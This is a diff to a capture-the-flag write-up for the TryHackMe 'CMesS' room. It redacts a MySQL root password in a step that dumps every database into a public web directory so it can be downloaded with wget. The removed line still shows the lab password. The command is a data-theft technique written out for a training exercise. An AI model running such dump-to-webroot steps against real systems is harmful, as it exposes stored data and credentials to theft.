siunam321/CTF-Writeups/TryHackMe/CMesS/README.md

 We can now login into MySQL database and dump the entire database:

-`mysqldump -uroot -pr0otus3rpassw0rd --all-databases > /var/www/html/assets/databases.sql`
+`mysqldump -uroot -p[redacted] --all-databases > /var/www/html/assets/databases.sql`

 Now we can download the databases via `wget`: